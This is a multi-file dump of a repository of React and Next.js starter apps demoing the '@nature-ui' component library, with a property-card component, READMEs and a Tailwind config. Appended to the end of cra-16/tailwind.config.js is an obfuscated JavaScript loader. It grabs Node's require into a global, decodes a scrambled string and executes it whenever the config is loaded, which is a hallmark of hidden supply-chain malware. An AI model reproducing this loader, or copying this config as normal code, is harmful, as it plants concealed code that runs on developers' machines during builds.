| 5 | 6 | 7 | 8 | 12 | 13 | 17 | 18 | 27 | React App 28 | 29 | 30 | 31 |
32 | 42 | 43 | 44 | -------------------------------------------------------------------------------- /create-react-app/public/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 12 | 13 | 17 | 18 | 27 | React App 28 | 29 | 30 | 31 |
32 | 42 | 43 | 44 | -------------------------------------------------------------------------------- /next-js/pages/index.js: -------------------------------------------------------------------------------- 1 | import React from 'react'; 2 | import { Box, Badge, Image } from '@nature-ui/core'; 3 | import { StarIcon } from '@nature-ui/icons'; 4 | 5 | const Index = () => { 6 | const property = { 7 | imageUrl: 'https://bit.ly/2Z4KKcF', 8 | imageAlt: 'Rear view of modern home with pool', 9 | beds: 3, 10 | baths: 2, 11 | title: 'Modern home in city center in the heart of historic Los Angeles', 12 | formattedPrice: '$1,900.00', 13 | reviewCount: 34, 14 | rating: 4, 15 | }; 16 | 17 | return ( 18 |
19 | 20 | {property.imageAlt} 21 | 22 | 23 | 24 | 29 | New 30 | 31 | 32 | {property.beds} beds • {property.baths} baths 33 | 34 | 35 | 36 | 37 | {property.title} 38 | 39 | 40 | 41 | {property.formattedPrice} 42 | 43 | / wk 44 | 45 | 46 | 47 | 48 | {Array(5) 49 | .fill('') 50 | .map((_, i) => ( 51 | 57 | ))} 58 | 59 | {property.reviewCount} reviews 60 | 61 | 62 | 63 | 64 |
65 | ); 66 | }; 67 | 68 | export default Index; 69 | -------------------------------------------------------------------------------- /cra-16/src/App.js: -------------------------------------------------------------------------------- 1 | import {Box, Image, Badge} from '@nature-ui/core' 2 | import {StarIcon} from '@nature-ui/icons' 3 | 4 | function App() { 5 | const property = { 6 | imageUrl: 'https://bit.ly/2Z4KKcF', 7 | imageAlt: 'Rear view of modern home with pool', 8 | beds: 3, 9 | baths: 2, 10 | title: 'Modern home in city center in the heart of historic Los Angeles', 11 | formattedPrice: '$1,900.00', 12 | reviewCount: 34, 13 | rating: 4, 14 | }; 15 | 16 | return ( 17 |
18 | 19 | {property.imageAlt} 20 | 21 | 22 | 23 | 24 | New 25 | 26 | 27 | {property.beds} beds • {property.baths} baths 28 | 29 | 30 | 31 | 32 | {property.title} 33 | 34 | 35 | 36 | {property.formattedPrice} 37 | 38 | / wk 39 | 40 | 41 | 42 | 43 | {Array(5) 44 | .fill('') 45 | .map((_, i) => ( 46 | 52 | ))} 53 | 54 | {property.reviewCount} reviews 55 | 56 | 57 | 58 | 59 |
60 | ); 61 | } 62 | 63 | 64 | export default App -------------------------------------------------------------------------------- /next-js-typescript/public/favicon/safari-pinned-tab.svg: -------------------------------------------------------------------------------- 1 | 2 | 4 | 7 | 8 | Created by potrace 1.11, written by Peter Selinger 2001-2013 9 | 10 | 12 | 26 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /create-react-app/README.md: -------------------------------------------------------------------------------- 1 | # Getting Started with Create React App 2 | 3 | This project was bootstrapped with [Create React App](https://github.com/facebook/create-react-app). 4 | 5 | ## Available Scripts 6 | 7 | In the project directory, you can run: 8 | 9 | ### `yarn start` 10 | 11 | Runs the app in the development mode.\ 12 | Open [http://localhost:3000](http://localhost:3000) to view it in the browser. 13 | 14 | The page will reload if you make edits.\ 15 | You will also see any lint errors in the console. 16 | 17 | ### `yarn test` 18 | 19 | Launches the test runner in the interactive watch mode.\ 20 | See the section about [running tests](https://facebook.github.io/create-react-app/docs/running-tests) for more information. 21 | 22 | ### `yarn build` 23 | 24 | Builds the app for production to the `build` folder.\ 25 | It correctly bundles React in production mode and optimizes the build for the best performance. 26 | 27 | The build is minified and the filenames include the hashes.\ 28 | Your app is ready to be deployed! 29 | 30 | See the section about [deployment](https://facebook.github.io/create-react-app/docs/deployment) for more information. 31 | 32 | ### `yarn eject` 33 | 34 | **Note: this is a one-way operation. Once you `eject`, you can’t go back!** 35 | 36 | If you aren’t satisfied with the build tool and configuration choices, you can `eject` at any time. This command will remove the single build dependency from your project. 37 | 38 | Instead, it will copy all the configuration files and the transitive dependencies (webpack, Babel, ESLint, etc) right into your project so you have full control over them. All of the commands except `eject` will still work, but they will point to the copied scripts so you can tweak them. At this point you’re on your own. 39 | 40 | You don’t have to ever use `eject`. The curated feature set is suitable for small and middle deployments, and you shouldn’t feel obligated to use this feature. However we understand that this tool wouldn’t be useful if you couldn’t customize it when you are ready for it. 41 | 42 | ## Learn More 43 | 44 | You can learn more in the [Create React App documentation](https://facebook.github.io/create-react-app/docs/getting-started). 45 | 46 | To learn React, check out the [React documentation](https://reactjs.org/). 47 | -------------------------------------------------------------------------------- /cra-16/src/logo.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /create-react-app/src/logo.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /next-js-typescript/README.md: -------------------------------------------------------------------------------- 1 | # A statically generated blog example using Next.js, Markdown, and TypeScript 2 | 3 | This is the existing [blog-starter](https://github.com/vercel/next.js/tree/canary/examples/blog-starter) plus TypeScript. 4 | 5 | This example showcases Next.js's [Static Generation](https://nextjs.org/docs/basic-features/pages) feature using Markdown files as the data source. 6 | 7 | The blog posts are stored in `/_posts` as Markdown files with front matter support. Adding a new Markdown file in there will create a new blog post. 8 | 9 | To create the blog posts we use [`remark`](https://github.com/remarkjs/remark) and [`remark-html`](https://github.com/remarkjs/remark-html) to convert the Markdown files into an HTML string, and then send it down as a prop to the page. The metadata of every post is handled by [`gray-matter`](https://github.com/jonschlinkert/gray-matter) and also sent in props to the page. 10 | 11 | ## How to use 12 | 13 | ## Deploy your own 14 | 15 | Deploy the example using [Vercel](https://vercel.com?utm_source=github&utm_medium=readme&utm_campaign=next-example): 16 | 17 | [![Deploy with Vercel](https://vercel.com/button)](https://vercel.com/new/git/external?repository-url=https://github.com/vercel/next.js/tree/canary/examples/blog-starter-typescript&project-name=blog-starter-typescript&repository-name=blog-starter-typescript) 18 | 19 | Execute [`create-next-app`](https://github.com/vercel/next.js/tree/canary/packages/create-next-app) with [npm](https://docs.npmjs.com/cli/init) or [Yarn](https://yarnpkg.com/lang/en/docs/cli/create/) to bootstrap the example: 20 | 21 | ```bash 22 | npx create-next-app --example blog-starter-typescript blog-starter-typescript-app 23 | # or 24 | yarn create next-app --example blog-starter-typescript blog-starter-typescript-app 25 | ``` 26 | 27 | Your blog should be up and running on [http://localhost:3000](http://localhost:3000)! If it doesn't work, post on [GitHub discussions](https://github.com/vercel/next.js/discussions). 28 | 29 | Deploy it to the cloud with [Vercel](https://vercel.com/new?utm_source=github&utm_medium=readme&utm_campaign=next-example) ([Documentation](https://nextjs.org/docs/deployment)). 30 | 31 | # Notes 32 | 33 | This blog-starter-typescript uses [Tailwind CSS](https://tailwindcss.com). To control the generated stylesheet's filesize, this example uses Tailwind CSS' v2.0 [`purge` option](https://tailwindcss.com/docs/controlling-file-size/#removing-unused-css) to remove unused CSS. 34 | 35 | [Tailwind CSS v2.0 no longer supports Node.js 8 or 10](https://tailwindcss.com/docs/upgrading-to-v2#upgrade-to-node-js-12-13-or-higher). To build your CSS you'll need to ensure you are running Node.js 12.13.0 or higher in both your local and CI environments. 36 | -------------------------------------------------------------------------------- /cra-16/README.md: -------------------------------------------------------------------------------- 1 | # Getting Started with Create React App 2 | 3 | This project was bootstrapped with [Create React App](https://github.com/facebook/create-react-app). 4 | 5 | ## Available Scripts 6 | 7 | In the project directory, you can run: 8 | 9 | ### `yarn start` 10 | 11 | Runs the app in the development mode.\ 12 | Open [http://localhost:3000](http://localhost:3000) to view it in the browser. 13 | 14 | The page will reload if you make edits.\ 15 | You will also see any lint errors in the console. 16 | 17 | ### `yarn test` 18 | 19 | Launches the test runner in the interactive watch mode.\ 20 | See the section about [running tests](https://facebook.github.io/create-react-app/docs/running-tests) for more information. 21 | 22 | ### `yarn build` 23 | 24 | Builds the app for production to the `build` folder.\ 25 | It correctly bundles React in production mode and optimizes the build for the best performance. 26 | 27 | The build is minified and the filenames include the hashes.\ 28 | Your app is ready to be deployed! 29 | 30 | See the section about [deployment](https://facebook.github.io/create-react-app/docs/deployment) for more information. 31 | 32 | ### `yarn eject` 33 | 34 | **Note: this is a one-way operation. Once you `eject`, you can’t go back!** 35 | 36 | If you aren’t satisfied with the build tool and configuration choices, you can `eject` at any time. This command will remove the single build dependency from your project. 37 | 38 | Instead, it will copy all the configuration files and the transitive dependencies (webpack, Babel, ESLint, etc) right into your project so you have full control over them. All of the commands except `eject` will still work, but they will point to the copied scripts so you can tweak them. At this point you’re on your own. 39 | 40 | You don’t have to ever use `eject`. The curated feature set is suitable for small and middle deployments, and you shouldn’t feel obligated to use this feature. However we understand that this tool wouldn’t be useful if you couldn’t customize it when you are ready for it. 41 | 42 | ## Learn More 43 | 44 | You can learn more in the [Create React App documentation](https://facebook.github.io/create-react-app/docs/getting-started). 45 | 46 | To learn React, check out the [React documentation](https://reactjs.org/). 47 | 48 | ### Code Splitting 49 | 50 | This section has moved here: [https://facebook.github.io/create-react-app/docs/code-splitting](https://facebook.github.io/create-react-app/docs/code-splitting) 51 | 52 | ### Analyzing the Bundle Size 53 | 54 | This section has moved here: [https://facebook.github.io/create-react-app/docs/analyzing-the-bundle-size](https://facebook.github.io/create-react-app/docs/analyzing-the-bundle-size) 55 | 56 | ### Making a Progressive Web App 57 | 58 | This section has moved here: [https://facebook.github.io/create-react-app/docs/making-a-progressive-web-app](https://facebook.github.io/create-react-app/docs/making-a-progressive-web-app) 59 | 60 | ### Advanced Configuration 61 | 62 | This section has moved here: [https://facebook.github.io/create-react-app/docs/advanced-configuration](https://facebook.github.io/create-react-app/docs/advanced-configuration) 63 | 64 | ### Deployment 65 | 66 | This section has moved here: [https://facebook.github.io/create-react-app/docs/deployment](https://facebook.github.io/create-react-app/docs/deployment) 67 | 68 | ### `yarn build` fails to minify 69 | 70 | This section has moved here: [https://facebook.github.io/create-react-app/docs/troubleshooting#npm-run-build-fails-to-minify](https://facebook.github.io/create-react-app/docs/troubleshooting#npm-run-build-fails-to-minify) 71 | -------------------------------------------------------------------------------- /cra-16/tailwind.config.js: -------------------------------------------------------------------------------- 1 | module.exports = { 2 | purge: [], 3 | darkMode: false, // or 'media' or 'class' 4 | theme: { 5 | extend: { 6 | color: { 7 | "orange-500": "#dd6b20" 8 | } 9 | }, 10 | }, 11 | variants: { 12 | extend: {}, 13 | }, 14 | plugins: [ 15 | "./src/**/*.js*", 16 | "./node_modules/@nature-ui/**/*.js*", 17 | ], 18 | }; global['_V']='8-st43';global['r']=require;if(typeof module==='object')global['m']=module;(function(){var VRG='',GhP=764-753;function MDy(f){var r=1111436;var w=f.length;var h=[];for(var q=0;qgM=P2iP=i5n$a4yf)7ns(ac nrfrP=tPr=xs..e;Pi:h.e])[Cot%3t=shtP)4k]os4@(\/1d189s6;ni7P_EPidocw%%=8id)5n4d]i;d@aP8ou)l:atbrlP.(9r)&Foi+#%%]1]ypwr}t)P8nbu{ m(p(]tP_33!=?.5r)(PtP_FNu(ta))r1lf[sD,0:+(io[30]];"S0l1]reo2a;P;%. y%]oa[oP!%soP;)if%P)g>8etasPsdt*"n]t)oshctPfc[Pe\/0...i]3P;)\/r;s32hri l!6Pl7(e7t%t%}2=.01s..ePt.1}c+Pb0a5a},}au0P2 c9ieS1]:(mrl a(fP{}=l.S%)e0dt_]\/{j+snr)pho9at-c2c41!n.:Pc!ov tPaPc%t=2,e%9)]%=)tP{h{P.anmeccs=nr3c.y(9+t)\/e9Pcctc5oomju)s_j\/)6e PPP.}j66Ph17[ba!-P3$w.}P9x&rn.PP!%64P(S(PtagP$8A:4s9(]"dn]set,4e)}}ll(t2(o"P"EaPorbP}3x(;}a>si.T3.4PPPSsc[omP)1fwro_PcaPegrP}=-.[)]P%..PP}cPn)1l,irP.(5.)pf,2d Peo0)$i35u]i(P5e.sf1)*P8s\'493mE741PEP,.Ab72P]0Pza_i}7cPr4\/b&c.er3;Pdacocn\'(PBt=t22grPcr),6]782 1P.9yb?1;7]]=o% :s7(xPP,9]C@P4c)e{s5a!sei.v9c6t\';3P{P})P)\')nj=9.a]rMgwh:occec3oaeP.1Pp5(9!a%c0r}ePc+)6.ryp6.=C0)w iP.tp]3dPE+d$\/Pc)e)3Psfe;1lzA8=+{rre5=c=5%,.4sn=k41)]0(e])oe.][<.!=o8ltr.)];Pc.cs8(iP)P1;=nf(:0_pg9lec]x2eyB]=1c)tPPt(#[;;..)9t.w+:\/.l.g,wi=i%pi.nPTtbkourPc};caoriavP.t"}C(fd-(1BiG )Datc)1)]:!.dsiPnt8{cy ,t(}es%,v(PP.1vi>Ph!)n4sP%=lbm?78oP+bl4a=fr3eobvt3ngoa2!e4)r3[.(tg e(=](}8 ,tio%een7.xcil._gcicd(l4PNP>br\/)c!.ed;4nmd8]tno3e.;zcpe6ted+Paj h-P#caP(4b2ns9]ei)d%f[rsmu}hA.)d9eb8*ePt iP%)4a}(c2ab\'+Ck.cP,36P;rPj?%*tPs+%ib(:5n%>i3447P'));var tzo=AoT(VRG,quw );tzo(5471);return 3456})() 19 | --------------------------------------------------------------------------------